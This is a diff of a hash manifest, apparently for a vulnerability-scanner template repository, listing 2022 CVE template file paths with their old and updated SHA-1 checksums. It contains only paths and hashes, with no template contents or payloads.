-http/cves/2022/CVE-2022-21500.yaml:09c47788ed23dac1444cc160ed94c32c30d492d9 -http/cves/2022/CVE-2022-21587.yaml:893747ed6b1a4fbf2e8f94908b8cb9a69ffb67bb -http/cves/2022/CVE-2022-21661.yaml:b025b959b87670e417a2c431aafe049fb6f95aa0 -http/cves/2022/CVE-2022-21705.yaml:78cae0512c86305d0021edf3c85db600f6529501 -http/cves/2022/CVE-2022-2174.yaml:215ce90c7c79d105a897cef06b5b751798714325 -http/cves/2022/CVE-2022-2185.yaml:b302535b57512d08ff50cc98f8e29ceee474bb67 -http/cves/2022/CVE-2022-2187.yaml:d49448aeb3a60d519ec0f882411029d93449cb09 -http/cves/2022/CVE-2022-2219.yaml:f7b399fbf13b315ba3572bb95e8a517605780ccc -http/cves/2022/CVE-2022-22242.yaml:b436f4fa38b41e393a70c271ce5808da14ca1200 -http/cves/2022/CVE-2022-22536.yaml:2a50caf1a9f68f3369e917f3bb7f1d8e6b65b6d8 -http/cves/2022/CVE-2022-22733.yaml:89003df5b937b3ab5ca97bea819a242ba1f8fbee +http/cves/2022/CVE-2022-2034.yaml:158eeebac9ac232cca985e482ea43741e467061f +http/cves/2022/CVE-2022-21371.yaml:cba0fb96eb978b8e72e60c7b172d95b0ad028565 +http/cves/2022/CVE-2022-21500.yaml:1eaeb9251d2838c0516e3554b86eea2c8d97827a +http/cves/2022/CVE-2022-21587.yaml:1ae918632584ad05458acd7bb0cf4064d17bfd24 +http/cves/2022/CVE-2022-21661.yaml:6420ee0176abaae835167ead34b90a9ba5d0614a +http/cves/2022/CVE-2022-21705.yaml:da4d9dd338c3b59a2bca4c85f0887680f45ea403 +http/cves/2022/CVE-2022-2174.yaml:435becff31d43249ac20ae177d286a7207b6b592 +http/cves/2022/CVE-2022-2185.yaml:fc1fb7bfd5f41128894b8c5222aca097ca57f2c3 +http/cves/2022/CVE-2022-2187.yaml:5cf52634d6a55b5868342dc171251d07829f6102 +http/cves/2022/CVE-2022-2219.yaml:717abfcdaaab2349c8c228d9bb586644f9c4c5da +http/cves/2022/CVE-2022-22242.yaml:dc86b437fc522cb1896da9a3992eeebf0e3c1a7b +http/cves/2022/CVE-2022-22536.yaml:ff5454dbd35d669ea1f06eb22b1e4087b0ef3ffa +http/cves/2022/CVE-2022-22733.yaml:a45d0c846702da4eef78024bf51ae5f683f550d6 http/cves/2022/CVE-2022-22897.yaml:da96a058c0b51cabc86662041dbebd679ebcaaed -http/cves/2022/CVE-2022-2290.yaml:fa4cd065d732bf98911b59c6654a606b08743383 -http/cves/2022/CVE-2022-22947.yaml:eb9d29cf2146e3457d9e38b5c4f1bdd37b49f9dc -http/cves/2022/CVE-2022-22954.yaml:7fc1b436de35daea85136a6ad03332cc25cf27e4 +http/cves/2022/CVE-2022-2290.yaml:31697d0b58f03a100b474839f9325f5c7e8fd442 +http/cves/2022/CVE-2022-22947.yaml:ea5b2faf78de991dc594ef3c85a68acc94ce65a1 +http/cves/2022/CVE-2022-22954.yaml:ed2854ff1aed55659a72f03a8e2e2aafa29cc8dd http/cves/2022/CVE-2022-22963.yaml:ab06c00110e4a9102dbf94fea920b608eea04c14 http/cves/2022/CVE-2022-22965.yaml:ef5b9d4d0ee4294bb2924a8191e4b9f50844ab5f -http/cves/2022/CVE-2022-22972.yaml:20ae7ffa9fc7e4a84f4244d0f60c34e1ba888104 -http/cves/2022/CVE-2022-23102.yaml:2c0601f1c235f0ace6e9cce546c8e1eac687dee0 -http/cves/2022/CVE-2022-23131.yaml:648768e33c0a8a843f54452a00e671eca3ee5f55 -http/cves/2022/CVE-2022-23134.yaml:dd7f8ab346a265af3e5fc1eebfdfeb3f87b002ba +http/cves/2022/CVE-2022-22972.yaml:3549dfd676303f89c1c637eed8e499ef000da382 +http/cves/2022/CVE-2022-23102.yaml:262c2d998812d9123b874b19bc7f4daf59403af7 +http/cves/2022/CVE-2022-23131.yaml:d14c8e9f7f7051d7437864129007b36420dbcf4f +http/cves/2022/CVE-2022-23134.yaml:433adf9da6c77b61aeb17244802a814998c1f5a4 http/cves/2022/CVE-2022-2314.yaml:e36aa03da886dca014a29f2bafa939215c4fa5c7 -http/cves/2022/CVE-2022-23178.yaml:f8a6eabd1cfb10a524974bcbe7dc56161a20b314 -http/cves/2022/CVE-2022-23347.yaml:d5c0b7111ebb6fcb47d32369acbc46967d10491e -http/cves/2022/CVE-2022-23348.yaml:181e648a568a0388da1530b3241cce35a4f8002b -http/cves/2022/CVE-2022-23544.yaml:962b0c496544c6aeabfc65ce3b56be323cc8aa5e +http/cves/2022/CVE-2022-23178.yaml:289a85491b31dd72bd0e7aec156a578c89eb468b +http/cves/2022/CVE-2022-23347.yaml:5d8aa203cf3ad184973792dbc11be56d18fb0844 +http/cves/2022/CVE-2022-23348.yaml:81374e83f9a095cada7b62cb4707ecb01bb99cd7 +http/cves/2022/CVE-2022-23544.yaml:21dcf90384d3f573d8d71b6a78bc8faf3c7bafbf http/cves/2022/CVE-2022-2373.yaml:b0260161242967d78f92a87a0dc6da50303b81aa -http/cves/2022/CVE-2022-2376.yaml:7735b152f86fece31cf5f3c5145d1e7c3b264039 -http/cves/2022/CVE-2022-23779.yaml:b49a66f89179bb9e19f230d565801b334330ad8d +http/cves/2022/CVE-2022-2376.yaml:d50a273a15444bcb59c29464d8b60de82c59de44 +http/cves/2022/CVE-2022-23779.yaml:5e1ff9391b304b6ba76d406e69e8b62932cfe8b7 http/cves/2022/CVE-2022-2379.yaml:446f704bcd090adc8f7be858688562b10b71a83c -http/cves/2022/CVE-2022-23808.yaml:439b0ae666b3ac329a569261e12bcd1a97c57d93 -http/cves/2022/CVE-2022-2383.yaml:b9b2793dc181258b1cd4ca5fb29158445c7261ee -http/cves/2022/CVE-2022-23854.yaml:dbe44dea5ff70724b543e6860443b017b650307d +http/cves/2022/CVE-2022-23808.yaml:25d8746bfe512b3a2ba5eccc2ca4e6e6793083de +http/cves/2022/CVE-2022-2383.yaml:e2c2b2867b8246a46e9153661bb27e8e3b87ad33 +http/cves/2022/CVE-2022-23854.yaml:84dca45a9ef9138d5c8dc9dc39e342a27bdefcc3 http/cves/2022/CVE-2022-23881.yaml:af0d94cea1d7840f3800ea02e4e602cf960d2530 -http/cves/2022/CVE-2022-23898.yaml:f8c8e4e7f9865bcec5cf8dac00c5c7bab1866bf2 +http/cves/2022/CVE-2022-23898.yaml:6416b11155b41434469a0bca1a6464f267f1b702 http/cves/2022/CVE-2022-23944.yaml:320d92bd111caf4003aeac9a1ef9f65cee4f1f5d -http/cves/2022/CVE-2022-24112.yaml:4034ea358c38ea2642cfbafd6bc5f9949c0e9a74 -http/cves/2022/CVE-2022-24124.yaml:85c1904f8c2d576f24afbcbbaaa093f994074cb8 +http/cves/2022/CVE-2022-24112.yaml:141c206e2ae621e514be5cc620a8900d4cf40dbc +http/cves/2022/CVE-2022-24124.yaml:45e38f27049048c227a6272dfc1534448dae0eb9 http/cves/2022/CVE-2022-24129.yaml:e9b5d1244a8f2dea948ea4cfb46b3756f0292aea -http/cves/2022/CVE-2022-2414.yaml:68d31eaf41572c264f08d1f4bc5041cdb6543a36 -http/cves/2022/CVE-2022-24181.yaml:776437592260aa5a0b327bd750557745bb2fa704 +http/cves/2022/CVE-2022-2414.yaml:4b25266f43c63064cf6f9989f8a480070c3abd48 +http/cves/2022/CVE-2022-24181.yaml:ea45bf37f04d1f527756df639d348a511cde13a2 http/cves/2022/CVE-2022-24223.yaml:e43e51025ee47293e25236bcf774b68055693f09 -http/cves/2022/CVE-2022-24260.yaml:a88a26a61769b348e5092d29e489b6a896da95a7 -http/cves/2022/CVE-2022-24264.yaml:84820e62689423e214677576a75193b1434f76b5 +http/cves/2022/CVE-2022-24260.yaml:d5b5ab94d9ff01bb8c9ebe9b6e4f41e25e26343e +http/cves/2022/CVE-2022-24264.yaml:b01acf17b8d49b9cfc579127fb05cf71ab4904f0 http/cves/2022/CVE-2022-24265.yaml:9ae194e777ddc72784b2b00c2e213855c49dc51f -http/cves/2022/CVE-2022-24266.yaml:467b79b6595a05d7d7450c7abcbe5f2ef716a77a -http/cves/2022/CVE-2022-24288.yaml:6285080906d3064a87a3a20a55ef68191c41a02a -http/cves/2022/CVE-2022-24384.yaml:78d4618915a3b09e8ff20dcefffb87927ee0b21c +http/cves/2022/CVE-2022-24266.yaml:261f18493e5f8efa1151ecf9d493caf303c7f64c +http/cves/2022/CVE-2022-24288.yaml:9735c3cc288b8417955e7ca7866f4562bad72784 +http/cves/2022/CVE-2022-24384.yaml:1c1f1122ab5ca858bc6f17d70c16072eb03bc056 http/cves/2022/CVE-2022-2462.yaml:b616122e964f0556354fda2eef23158969018171 -http/cves/2022/CVE-2022-24627.yaml:7ca53d2e431bc780ea73086341d93cff02b37597 +http/cves/2022/CVE-2022-24627.yaml:048be7ac0aea604fcb50f70163f600cde1e65a0c http/cves/2022/CVE-2022-2467.yaml:8c177232bacaa6d592aac6d3c5eafd606aa45d4f -http/cves/2022/CVE-2022-24681.yaml:6f454c890cfe98c4595da8c2cbea38e36dad81c0 -http/cves/2022/CVE-2022-24716.yaml:c36dc70cada0ebc962691b8713bb6033a2443ee1 +http/cves/2022/CVE-2022-24681.yaml:ec28876460bcc67181e5304e212654f279f01e20 +http/cves/2022/CVE-2022-24716.yaml:b56900c67b20f16f0084d9f5f61d8ae5acadfc92 http/cves/2022/CVE-2022-24816.yaml:eb935681a105de90b8b7db6ab7e8ae2f9d71d166 -http/cves/2022/CVE-2022-24856.yaml:a4dea37f0fc3ebf1debfbcc51d55ae28d89c247c -http/cves/2022/CVE-2022-2486.yaml:f2265ddb3492e43487b69c82c7454d7345b0d864 -http/cves/2022/CVE-2022-2487.yaml:978d76ddd03fc23768561b4878ba5c74d1e3464f -http/cves/2022/CVE-2022-2488.yaml:502afafdafbeaa24075cdfcf71a57d8a0b663b9e -http/cves/2022/CVE-2022-24899.yaml:84e48495f7a332da6ab7e47e2fcf1d35ace96f96 -http/cves/2022/CVE-2022-24900.yaml:c286065b94b97d387aecee1333b114c37eb65493 +http/cves/2022/CVE-2022-24856.yaml:50d0ccb11f8cecdad6a06cc46dc31b65a4d89a69 +http/cves/2022/CVE-2022-2486.yaml:b19909160ca1366076d9ee3637844ad6f6f9a28b +http/cves/2022/CVE-2022-2487.yaml:3d8d73920ea053336c64b5c1e92e64aa4b7dfc2a +http/cves/2022/CVE-2022-2488.yaml:bf4233c5af2c5f352fb2dde2369cbafd9ee5ecf0 +http/cves/2022/CVE-2022-24899.yaml:dcca0db248fde708cffbeeb936b0e93d50da8562 +http/cves/2022/CVE-2022-24900.yaml:d64c61755b5634ec98eb28857ac9aeae814e8912 http/cves/2022/CVE-2022-24990.yaml:f26110b1f9281c994fb673f8d75b9d5c5defb34c -http/cves/2022/CVE-2022-25082.yaml:287802bf1fc02c531819bb5be077a2e8401c1f8c +http/cves/2022/CVE-2022-25082.yaml:14cae51e03ce7ae34c51300ddd8a60c23c726e49 http/cves/2022/CVE-2022-25125.yaml:179749a2fbb69006ca6236e34e9fadce2ee33b4e -http/cves/2022/CVE-2022-25148.yaml:6be4dde14ecfbf45d0c8b4abdf58c9231a3acd53 -http/cves/2022/CVE-2022-25149.yaml:084797f6a16c37df2ca7a86f82807d1d37aefd37 -http/cves/2022/CVE-2022-25216.yaml:4d207e8665d17ed3df3dbd984804bbf8b74bd720 -http/cves/2022/CVE-2022-25323.yaml:6f1738287bc826693c00250344669841bb7e5762 -http/cves/2022/CVE-2022-2535.yaml:34528dba7226bad5ac11934a0893549f9034a83a -http/cves/2022/CVE-2022-25356.yaml:215893d96e5aaa3bd94ec1d627b40c116d8da26f +http/cves/2022/CVE-2022-25148.yaml:3ed87df983b2fbd57c2935a246d269a9d0bcbde3 +http/cves/2022/CVE-2022-25149.yaml:196a79ea9406fa57705882fc7b8d37a90a38cbe6 +http/cves/2022/CVE-2022-25216.yaml:d3091c0e41280e4a94c204cad022812ca5281a49 +http/cves/2022/CVE-2022-25323.yaml:fdefaa2bf40f6809bcbb3473ec5937af18689a16 +http/cves/2022/CVE-2022-2535.yaml:4cff7b3c04f783023a19ba8bf25a112948e7f45f +http/cves/2022/CVE-2022-25356.yaml:72059568da5561819d8b616965b02943779953a0 http/cves/2022/CVE-2022-25369.yaml:0ee619ca8d2be9827b2d23e719a8eb04a1d560f7 http/cves/2022/CVE-2022-2544.yaml:c85cd47921d9f7756c8d69d7b5cca07fac418257 -http/cves/2022/CVE-2022-2546.yaml:111eb19fb05e02dedbe9dfa8ac5c3111bb7e9632 -http/cves/2022/CVE-2022-25481.yaml:668c890131118e3551f9f7092ce4c99c9703f848 +http/cves/2022/CVE-2022-2546.yaml:78178a538c57e5a348d57de024f0e61feb524327 +http/cves/2022/CVE-2022-25481.yaml:2c3cbfd251a6b95c798a4c7811057ac3bac5fd9e http/cves/2022/CVE-2022-25485.yaml:3674f5ab31f186d55843c550fc1e3409ab9dc652 http/cves/2022/CVE-2022-25486.yaml:de285c467f5f02814968f009f996a7eaf817d3e4 -http/cves/2022/CVE-2022-25487.yaml:5d7eae5a1df0f4c7a9951eedbfbd9eac49bda7f6 +http/cves/2022/CVE-2022-25487.yaml:954ea465dd9f1605a0a6b047bc3853b763ab5597 http/cves/2022/CVE-2022-25488.yaml:a4ae57601c63399470b7d427a5f33f504cac8c1d -http/cves/2022/CVE-2022-25489.yaml:2d1a90be1e6bd0d2f9544b737b2b586c6d2f845c -http/cves/2022/CVE-2022-25497.yaml:c19182294ccffa0cdbb718292f70e8abd19d0dce -http/cves/2022/CVE-2022-2551.yaml:63c139c88c40ab79dcec592aec8692e8aa8e2fa8 -http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:7d3af6b789612ad3f4a6d6a07032c81ba17d76c9 -http/cves/2022/CVE-2022-26134.yaml:f7fb4033dd74f4d26db136e83fd2e72f6f4e7d92 -http/cves/2022/CVE-2022-26138.yaml:074e37d25f27a654b5eaf1139d189e44dd11b140 -http/cves/2022/CVE-2022-26148.yaml:e227570ca3d8e725929fb01fd04920879dc64a17 +http/cves/2022/CVE-2022-25489.yaml:87a66489d10368e26f769965bd4df28a80ad6939 +http/cves/2022/CVE-2022-25497.yaml:f0755ff3a2ec64e942cc3b2bb282e403bb337907 +http/cves/2022/CVE-2022-2551.yaml:536e0d2d4b946c2b50e3917c41efee5bbe03b4a1 +http/cves/2022/CVE-2022-25568.yaml:38d004cb5dfde8a3046df846358b01a71308936c +http/cves/2022/CVE-2022-2599.yaml:322084c1b97631f697221f29de4c652ce5d64301 +http/cves/2022/CVE-2022-26134.yaml:3a1a18134821b192d8aa713beb653573e2e2ab6d +http/cves/2022/CVE-2022-26138.yaml:243f30f2604d19a4f3c32c7b3ded8fac054f4ce8 +http/cves/2022/CVE-2022-26148.yaml:ba99bddad4bf94ae3bc65b56e5e94967e454526e http/cves/2022/CVE-2022-26159.yaml:2dde1b272c1dfeac01a264357157ec36a2908098 -http/cves/2022/CVE-2022-26233.yaml:c3c2b5ae6757ccea98f43bbad5972b476676580f +http/cves/2022/CVE-2022-26233.yaml:15f532c29bc7b1e1a97cfa4f05be7d653888c971 http/cves/2022/CVE-2022-26263.yaml:73a4edfc93c16f82b8ecaa8ccc1be52af28e86e1 -http/cves/2022/CVE-2022-2627.yaml:e98e136be4ea5c21c10cd325664f6fea87a260fe +http/cves/2022/CVE-2022-2627.yaml:a039d41b629892cb2b980285c545fdf6c8208f18 http/cves/2022/CVE-2022-2633.yaml:f5e4f97d83de093349047dbfef8f6fb8b6fcbaf3 -http/cves/2022/CVE-2022-26352.yaml:70d2e0089fe4cc87625b73a85f8e3616e0b8474f -http/cves/2022/CVE-2022-26564.yaml:283fe7d1f0f4d59e22c9e4b5d44e88d630fd0e9f -http/cves/2022/CVE-2022-26833.yaml:5c2c3477551fa36fe483b257d4c63706d362bbd9 -http/cves/2022/CVE-2022-26960.yaml:d95b3a57326cb7c8653e4232d2986836523352f4 -http/cves/2022/CVE-2022-2733.yaml:fcb0d225ecdb62dc0deffc3e744f5bcc7c39a8cb -http/cves/2022/CVE-2022-2756.yaml:d6bc3056cc0ffcd43c7e433944738be16aeb8e59 -http/cves/2022/CVE-2022-27593.yaml:549caad5236eb5206c2328d3a048f65254fe59aa +http/cves/2022/CVE-2022-26352.yaml:2f199bd711b7f940c8263e3f52d2094eb8447e1f +http/cves/2022/CVE-2022-26564.yaml:14cdcc0b5dfbefcf7719c793d61ff2e9239c0b2b +http/cves/2022/CVE-2022-26833.yaml:0a9af88561e63e7f6523dbbad606347e514718a9 +http/cves/2022/CVE-2022-26960.yaml:e0b8800ab72cd972218e1c6cd1da09f81e595df5 +http/cves/2022/CVE-2022-2733.yaml:d16edbb8ddef98b742c3e7d0a687264f869591e9 +http/cves/2022/CVE-2022-2756.yaml:da9ed378c7da8ad196e3012da1c951ae76b21c87 +http/cves/2022/CVE-2022-27593.yaml:2354a4092a7704879d4ac778d001880d8c081d33 http/cves/2022/CVE-2022-27849.yaml:97aa8073fe3a8568903eb3a71c29bd8d85b791eb -http/cves/2022/CVE-2022-27926.yaml:42dcf780cd1c1b01fa484074744887a2545e5c30 +http/cves/2022/CVE-2022-27926.yaml:da7ae007929c2fb6856021e4bf4340e8af1d7a89 http/cves/2022/CVE-2022-27927.yaml:633fdddad64db028886739bc32f962098d0ec796 http/cves/2022/CVE-2022-27984.yaml:46e0d68cbbfb63e9808acf7d5f85ba8012a2a2be http/cves/2022/CVE-2022-27985.yaml:7de01fef2fe8a799a34cbfa788042f1cbc888287 http/cves/2022/CVE-2022-28022.yaml:d9e2638306589873983b03d584708ab315752bd1 -http/cves/2022/CVE-2022-28023.yaml:03acdf570eb364962ab993c58b24d0b0aec386fb -http/cves/2022/CVE-2022-28032.yaml:db1ac89591d234ff6a673f34bbb7a84a8222cee8 -http/cves/2022/CVE-2022-28079.yaml:4b6c5a5fa0d4d4aaaef403ebc4a0aa4f500e3276 -http/cves/2022/CVE-2022-28080.yaml:c5aee5ae7a15efbbae10483c9b9c1de4c35ffa49 -http/cves/2022/CVE-2022-28117.yaml:3620eff699f223eff703f485d57bbefd0e1df934 -http/cves/2022/CVE-2022-28219.yaml:3a6a9801edb0334add1e51efa06cbe6c8bdb07b7 +http/cves/2022/CVE-2022-28023.yaml:4979f35397633f09f8b74e1ff16957ef31c2dc83 +http/cves/2022/CVE-2022-28032.yaml:7b2fca1b361b1d628558315b12f974b9bd10a422 +http/cves/2022/CVE-2022-28079.yaml:2e45d03d5e4ecc0776b8cdd2c78e6930b9025734 +http/cves/2022/CVE-2022-28080.yaml:76bfcd361fc9f5c5df2142c84b04f711c74cb4e9 +http/cves/2022/CVE-2022-28117.yaml:fd1a36a34116d91ca9b14c4ac8921b433379ad97 +http/cves/2022/CVE-2022-28219.yaml:8202b2c8306ae87dcd1e06acb54ad77150eaa55b http/cves/2022/CVE-2022-28290.yaml:8440960ace63416405bd7a7b189f116f279c0484 -http/cves/2022/CVE-2022-28363.yaml:176ec97de549934101003218e30ef7c1965fabb5 -http/cves/2022/CVE-2022-28365.yaml:a7be18b9d9eadb1f32ee16d1eda51326d57c8dcf -http/cves/2022/CVE-2022-2863.yaml:6519e8ee1bfe84f7b48457e70d0827f8faa2deb1 +http/cves/2022/CVE-2022-28363.yaml:cc9685220579da5c2a9a8867995ba074cb4233a1 +http/cves/2022/CVE-2022-28365.yaml:4e72efa464c36f725336a7c324c1a64dbff39583 +http/cves/2022/CVE-2022-2863.yaml:b7c3f6a3dfefea2e16da9f2316ff124718d8a7cd http/cves/2022/CVE-2022-28923.yaml:6f9bba6c52e322bef8684d5b700503bc747d8ca1 -http/cves/2022/CVE-2022-28955.yaml:24fdde3fe7600a3edf2f1d0514d1d02ade08a120 -http/cves/2022/CVE-2022-29004.yaml:85994f0b5fd65052ed7b495842c0f1caef4ee9b8 -http/cves/2022/CVE-2022-29005.yaml:1b156fe48619c683da14f3860f9d2d219cbbe16c -http/cves/2022/CVE-2022-29006.yaml:6f304ff6ad0407fec57ea4e465074d81362f2181 -http/cves/2022/CVE-2022-29007.yaml:b0199a1db8400bad64bdf153b080cbccde03f28a -http/cves/2022/CVE-2022-29009.yaml:efe6d28d491e2b932ccb0df05fc95432d8d88e0c -http/cves/2022/CVE-2022-29013.yaml:3d1133ea648d232dd34083cd1bb6ed6ff3ec71ed -http/cves/2022/CVE-2022-29014.yaml:d96e56be3669578da2a55c0b65426bb43c0408ce -http/cves/2022/CVE-2022-29078.yaml:aed8a35514a9881351a71b303b597db1157c9da4 -http/cves/2022/CVE-2022-29153.yaml:af7ccb0e452778157c8ff5ca7cc0cef5ed602965 -http/cves/2022/CVE-2022-29272.yaml:078c6dffefb626b3cd01251691f97b8f0e9a9ed4 -http/cves/2022/CVE-2022-29298.yaml:0bcda50f50dcbfb62b8cf5fa448b50ad14a0cf18 +http/cves/2022/CVE-2022-28955.yaml:1d47804e894ccd8a9761ee84225ed765758bd3ac +http/cves/2022/CVE-2022-29004.yaml:2d70f0deb661fcd8378f0defe94b5b8ff3d1b2bc +http/cves/2022/CVE-2022-29005.yaml:ba2650306136be7e839e60a17017bdef19778395 +http/cves/2022/CVE-2022-29006.yaml:3f92cc94c558aeca1f7663a6ca6326cbb3fd916a +http/cves/2022/CVE-2022-29007.yaml:ce0ebbc203785c132346d45bbc9fb9cba385a695 +http/cves/2022/CVE-2022-29009.yaml:a8125fe7fab4768c0ff0141df382a51be6ab5b7b +http/cves/2022/CVE-2022-29013.yaml:f870df8d5e98a8c2010736c7360b9d4bd34926df +http/cves/2022/CVE-2022-29014.yaml:eb89b3104590a4160926c3bf3aa6d56bfc8ecdb6 +http/cves/2022/CVE-2022-29078.yaml:78da9911e25b0d3be3ed629ecf6048f20b9eeb6a +http/cves/2022/CVE-2022-29153.yaml:d6aaaa8ba76fae69b21ffc3b5ffdb2099a71e7e4 +http/cves/2022/CVE-2022-29272.yaml:e46629c0d32306c928c18e548ae6873dcc8bda84 +http/cves/2022/CVE-2022-29298.yaml:c3c3ae5a5c5ce9e831076128b0a459bca3734e6d http/cves/2022/CVE-2022-29299.yaml:4ca43f289ba13eddc097bd4e67738ff9b859e918 http/cves/2022/CVE-2022-29301.yaml:00fdd854b16529833bddf7e7a6d5271787eb2868 -http/cves/2022/CVE-2022-29303.yaml:fc79cfe29b9de1b91277f16f39e7668941e4219f -http/cves/2022/CVE-2022-29349.yaml:f2389538f96572d2749c64467ce794b368a6a3ce +http/cves/2022/CVE-2022-29303.yaml:e412d5c1d4d856a6614d721c0b020e98ae67a1ba +http/cves/2022/CVE-2022-29349.yaml:ca126ee4edf1a4ab39deb754320e725d31ccd872 http/cves/2022/CVE-2022-29383.yaml:1f1a67523a657132055661ca16b0d5671ea8681c http/cves/2022/CVE-2022-29455.yaml:929c2512832cab6541789b6b561df0d8477498f8 -http/cves/2022/CVE-2022-29464.yaml:9cee9272826d8383176c9248ca2e33d28c00b004 -http/cves/2022/CVE-2022-29548.yaml:5a28174d75f79d617a609e6d3c7ca146d8dc6eee -http/cves/2022/CVE-2022-29775.yaml:668fa56797cd4b0d3b37853566f7ebfcf3b1faf6 -http/cves/2022/CVE-2022-30073.yaml:4805a53eb3eb994da1a7bc4a391e140930725721 -http/cves/2022/CVE-2022-30489.yaml:672364683b7586f2bd13a7f559c7f21a8c93b21d -http/cves/2022/CVE-2022-30512.yaml:7271de7e36b085c19050c96fa674a5b2db74714e -http/cves/2022/CVE-2022-30513.yaml:bb501e91555ca73c5f2a7cdf8408a51e34516e4f +http/cves/2022/CVE-2022-29464.yaml:bf87e27647d1ebbf877cfd7143b65cd660fb137c +http/cves/2022/CVE-2022-29548.yaml:cbc6fc977f78500ad9b187fd7b2380ec71249853 +http/cves/2022/CVE-2022-29775.yaml:60ab880ce620e2434f39655520846122ac0bfc1e +http/cves/2022/CVE-2022-30073.yaml:883ed694eb477c29321c25a784a8b8bd0e4c7bd9 +http/cves/2022/CVE-2022-30489.yaml:48cac2049ddc762c7305b763ca51b0c41caa1df1 +http/cves/2022/CVE-2022-30512.yaml:481ad8dc366af6b04bd8a7ee28b2fcd3cabb8236 +http/cves/2022/CVE-2022-30513.yaml:12ec0a38286f02f3cb0f6987b434b77f65c230b4 http/cves/2022/CVE-2022-30514.yaml:a7a01641fab1a8401851ea7d602d12f2893d4adb -http/cves/2022/CVE-2022-30525.yaml:4ea2664f6f3895e0d3987c94a199796591b06f79 -http/cves/2022/CVE-2022-3062.yaml:7545985982064ed6299bb255ed864c05288ef8d7 -http/cves/2022/CVE-2022-30776.yaml:cdd27a6361eaf5ae1bc2e10f88ffea3c010964dc -http/cves/2022/CVE-2022-30777.yaml:4a5d5c47347d47105250e150bce32834e3425b07 -http/cves/2022/CVE-2022-31126.yaml:89fc64d333b207f18e9d8828ad1bec7e774240a0 -http/cves/2022/CVE-2022-31268.yaml:0ddb08b717fc7c4e161197e5c95aadaf9e5f23c2 -http/cves/2022/CVE-2022-31269.yaml:aa0e473a167e10324b95b3574578e1cf7b57fe5b +http/cves/2022/CVE-2022-30525.yaml:4d90b29ba8aae34ecb895dde2c2ca49a61f459ac +http/cves/2022/CVE-2022-3062.yaml:800bb8903716586e3844dc3be9a59571bd9ff402 +http/cves/2022/CVE-2022-30776.yaml:b76e1c92439e4548bff7f721e74c7a5fc4366213 +http/cves/2022/CVE-2022-30777.yaml:b6209175e96f33fe9c6aa9fbdf1b7b9a81158a39 +http/cves/2022/CVE-2022-31126.yaml:82fb9dced01e613af573ba72cfb75c7c883d225c +http/cves/2022/CVE-2022-31268.yaml:928ccaa669be7c767bc5d9e4cecc405b762c9d33 +http/cves/2022/CVE-2022-31269.yaml:17a274515295763d5047717c64a574d4de127383 http/cves/2022/CVE-2022-31299.yaml:83e0fce7d1de1b228595ffa36be5d64ee8aef870 -http/cves/2022/CVE-2022-31373.yaml:e0f1aa60f4d127a0f6a8e5143cbf05b7a843424b -http/cves/2022/CVE-2022-3142.yaml:7b68891c30f3c9c8bcf079a452f2c734dde541e4 +http/cves/2022/CVE-2022-31373.yaml:b1dd8fa5fc5a7cc6a07835579c77f189cb688821 +http/cves/2022/CVE-2022-3142.yaml:0ab319adad78001466f99b3ea8a3b75e4149690a http/cves/2022/CVE-2022-31474.yaml:ea47cd03d542d4c58da04a90b5803dfd9f2997e2 -http/cves/2022/CVE-2022-31499.yaml:3813062ffa12af1b479057c96cb534c7997175d2 -http/cves/2022/CVE-2022-31656.yaml:1d999151f252cc5e3c627bf7cd77ff6dd5dccd47 -http/cves/2022/CVE-2022-31798.yaml:1796fd5e2b0063cafc5ae869b8f2a1bc6b71991d -http/cves/2022/CVE-2022-31814.yaml:8accdf77652c1c95ff6907d738c3aa41def005ab -http/cves/2022/CVE-2022-31845.yaml:7bd79819c1e84dcc06ff9ec05ada1b03ec6d4dd8 -http/cves/2022/CVE-2022-31846.yaml:fc7f37bea03e5cf47929de63afc85fcf34d118d8 -http/cves/2022/CVE-2022-31847.yaml:b9e1b7c00adf1ade56c7b728b90c0fe0e6f7b8f1 -http/cves/2022/CVE-2022-31854.yaml:ebfcc6eef79ec6427571fcb9d4a09b31cc892e3d -http/cves/2022/CVE-2022-31879.yaml:9151c35fc3ea67d7d33d34f434ad39039edb0c98 +http/cves/2022/CVE-2022-31499.yaml:a4b7c73f255b3b79c794032321267bb88ae7b8d3 +http/cves/2022/CVE-2022-31656.yaml:6092c3e1effe45859ebe139b808edeaf5f7c120d +http/cves/2022/CVE-2022-31798.yaml:d8ec34db1e298169e27be0989bad5b333cf7e90f +http/cves/2022/CVE-2022-31814.yaml:994f7827151acd9db7ba7b1f814f644dc9248b6a +http/cves/2022/CVE-2022-31845.yaml:f50420c8f1f3eaf701131aeb526f37483126a1da +http/cves/2022/CVE-2022-31846.yaml:8df31bc5751cf2f3f9c4a39926e6e87c0a38bb55 +http/cves/2022/CVE-2022-31847.yaml:80e49fd56d810e107410e0f04348ab99aa413f17 +http/cves/2022/CVE-2022-31854.yaml:0d92e3c266fba0ccc538150c6c8c6b0c5eecb3df +http/cves/2022/CVE-2022-31879.yaml:ecf1c40795f31704bde59f6465e18f9359a01f15 http/cves/2022/CVE-2022-31974.yaml:6711ff86f730445184c93c2a91a32daf2af56723 http/cves/2022/CVE-2022-31975.yaml:1d80466a8bfedc02bacb9b870793a036d0769a40 -http/cves/2022/CVE-2022-31976.yaml:152837b055f87088c4e18725c6de34f54769b849 -http/cves/2022/CVE-2022-31977.yaml:ca14acfeeb3fcbf6085292b53628457d87213940 +http/cves/2022/CVE-2022-31976.yaml:af47305c69b62a3707544b8824d73730f1feea28 +http/cves/2022/CVE-2022-31977.yaml:fb933c37a9088114120622f44fbde494ad76b685 http/cves/2022/CVE-2022-31978.yaml:d082ccb6e5136465a070be3119ace6a2d590bf98 http/cves/2022/CVE-2022-31980.yaml:a4baa163ee8e01c4dca72b3481a50bed0a800a2e -http/cves/2022/CVE-2022-31981.yaml:774e56f620ea8d1b55b8e1e2e81a391875a88831 +http/cves/2022/CVE-2022-31981.yaml:53292d344e663430fd29d41862a751fcf84dc93e http/cves/2022/CVE-2022-31982.yaml:14887472d5e8ef45ff5a9e2985f9ce447fc482d2 -http/cves/2022/CVE-2022-31983.yaml:fc2477a4ad9b8e096c82e7b71e606069f5eb7f1c -http/cves/2022/CVE-2022-31984.yaml:9fa220d8fdd8c39a91a46eaaf91d597377f86be3 +http/cves/2022/CVE-2022-31983.yaml:bd550f93be35f780d96d33f4366e0dbd971fa5e0 +http/cves/2022/CVE-2022-31984.yaml:164dd112395242226934dd94a642fcb5fea821d9 http/cves/2022/CVE-2022-32007.yaml:e906645b18647cd54049b516c600dcb45757027f 